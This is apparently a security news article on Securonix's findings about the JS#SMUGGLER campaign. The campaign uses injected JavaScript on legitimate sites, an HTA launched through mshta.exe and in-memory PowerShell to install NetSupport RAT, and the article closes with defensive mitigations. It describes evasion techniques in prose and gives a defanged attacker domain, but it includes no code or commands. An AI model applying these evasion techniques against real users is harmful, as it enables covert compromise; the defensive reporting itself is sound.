Researchers at Securonix have documented a sophisticated multi‑stage malware campaign dubbed JS#SMUGGLER, in which attackers compromise legitimate websites and use them as launch pads to deliver the NetSupport RAT remote access trojan. The campaign primarily targets corporate users who visit trusted business sites during normal work activities, significantly increasing the likelihood of successful infection.
JS#SMUGGLER multi‑stage attack chain and use of NetSupport RAT
The JS#SMUGGLER infection chain follows a “nested” architecture that complicates analysis and detection. It consists of three main components: a heavily obfuscated JavaScript loader, an HTA file executed via mshta.exe, and a PowerShell payload that ultimately installs NetSupport RAT. This layered design helps evade traditional security tools that focus on single artifacts, static signatures, or isolated processes.
NetSupport RAT is a legitimate remote administration tool that is frequently abused in malware campaigns. Once deployed, it provides the attacker with full remote control of the compromised host: interactive desktop access, file management, command execution, data exfiltration, and even the ability to route traffic through the victim as a proxy node. In effect, the infected workstation becomes a controlled remote agent in the adversary’s infrastructure.
Initial compromise: injected JavaScript, hidden redirects and victim profiling
The attack begins with a stealthy redirect injected into the code of a legitimate site. This code loads an external JavaScript file named phone.js from an attacker‑controlled domain and executes it in the background, without any visible indication to the user. Because the redirect is embedded into trusted pages, it bypasses many users’ traditional caution around “suspicious links.”
The phone.js script is strongly obfuscated, making static analysis and signature‑based detection difficult. Its first task is device profiling: it determines whether the client is a mobile or desktop device and adjusts the subsequent attack path accordingly. For mobile visitors, it displays a fullscreen iframe, while desktop users are silently handed off to a second‑stage script that continues the infection chain.
A notable feature of JS#SMUGGLER is the use of an invisible iframe that triggers the redirect only on the first visit associated with a specific identifier. This “single‑use trigger” significantly reduces the chance that security teams or automated scanners will observe the malicious behavior, because subsequent visits to the same URL may appear completely benign.
Second stage: HTA abuse, mshta.exe and in‑memory PowerShell execution
For desktop systems, the first‑stage JavaScript dynamically constructs a URL for an HTA payload and launches it using the Windows utility mshta.exe. HTA (HTML Application) files allow HTML and JavaScript to run as native Windows applications, a capability that is widely documented in security frameworks such as MITRE ATT&CK as a common “living‑off‑the‑land” technique leveraging trusted system binaries.
Once executed, the downloaded HTA acts as an additional loader. It deploys a temporary PowerShell stager to disk, decrypts it, and then runs it directly in memory. The HTA window is minimized or hidden by disabling standard interface elements, ensuring the entire process remains invisible to the user. This design avoids obvious UI artifacts while chaining legitimate components: browser → mshta.exe → PowerShell.
The decrypted PowerShell payload is responsible for downloading and installing the final malware, NetSupport RAT, and establishing persistence on the host. By favoring in‑memory execution and short‑lived temporary files, the attackers reduce on‑disk traces and complicate detection by traditional antivirus products that rely on file scanning and straightforward signatures.
Attribution: possible links to the SmartApeSG threat group
The domain used to host the JavaScript loader, boriver[.]com, is flagged by the Abuse.ch platform as associated with the SmartApeSG threat group, also known as HANEYMANEY and ZPHP. Public reporting indicates that this group has been actively using JavaScript injections on legitimate sites to distribute NetSupport RAT since late 2024, following a similar operational playbook.
Despite these overlaps in infrastructure and tooling, Securonix assesses the attribution with caution. It remains unclear whether JS#SMUGGLER is a direct operation of SmartApeSG or whether another actor is reusing domains, techniques, and payloads associated with that group. No definitive links to a specific country, APT cluster, or financially motivated crew have been established.
Enterprise risks and mitigation strategies against JS#SMUGGLER and NetSupport RAT
JS#SMUGGLER poses particular risk to enterprise environments because it exploits users’ trust in well‑known, previously safe websites. In this model, traditional user awareness guidance to “avoid unknown links” is less effective: the malicious chain can start from a routinely used vendor portal, news site, or business partner’s web page that has been compromised.
1. Enforce strict Content Security Policy (CSP)
Organizations should implement restrictive CSP rules that tightly control which domains are allowed to load scripts and iframes. Blocking unapproved external JavaScript sources and disallowing HTA‑related content can disrupt the initial JS#SMUGGLER loader and reduce exposure to similar web‑based attacks.
2. Harden and monitor PowerShell usage
Enabling advanced PowerShell logging, constraining script execution policies, and using features such as Constrained Language Mode significantly complicate the execution of stealthy stagers. Security teams should baseline normal PowerShell activity and alert on suspicious patterns, including encoded commands, network callbacks, and child processes spawned from browsers or mshta.exe.
3. Block mshta.exe and HTA where not required
In most corporate environments, HTA applications are not required for legitimate business operations. Blocking or restricting mshta.exe via AppLocker, Windows Defender Application Control (WDAC), or equivalent application control solutions eliminates a commonly abused “living‑off‑the‑land” binary from the attacker toolbox.
4. Use EDR/XDR for behavioral detection
Modern EDR/XDR platforms can identify anomalous process chains (browser → mshta.exe → PowerShell), unusual parent‑child relationships, and suspicious outbound connections to low‑reputation domains. Behavioral rules focusing on these patterns, combined with TLS inspection where appropriate, improve the chances of detecting JS#SMUGGLER‑style campaigns early in their lifecycle.
As multi‑stage campaigns abusing tools like NetSupport RAT become more prevalent, organizations should regularly reassess security policies, update defensive technologies, and invest in user education that emphasizes caution even on “trusted” websites. Combining layered technical controls, continuous monitoring, network segmentation, and a mature incident response process remains essential to limiting the impact of complex web‑borne threats such as JS#SMUGGLER.
